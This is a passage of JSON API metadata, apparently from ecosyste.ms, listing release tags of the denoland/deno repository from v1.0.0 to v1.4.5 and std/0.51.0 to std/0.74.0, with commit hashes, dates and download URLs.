sed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0"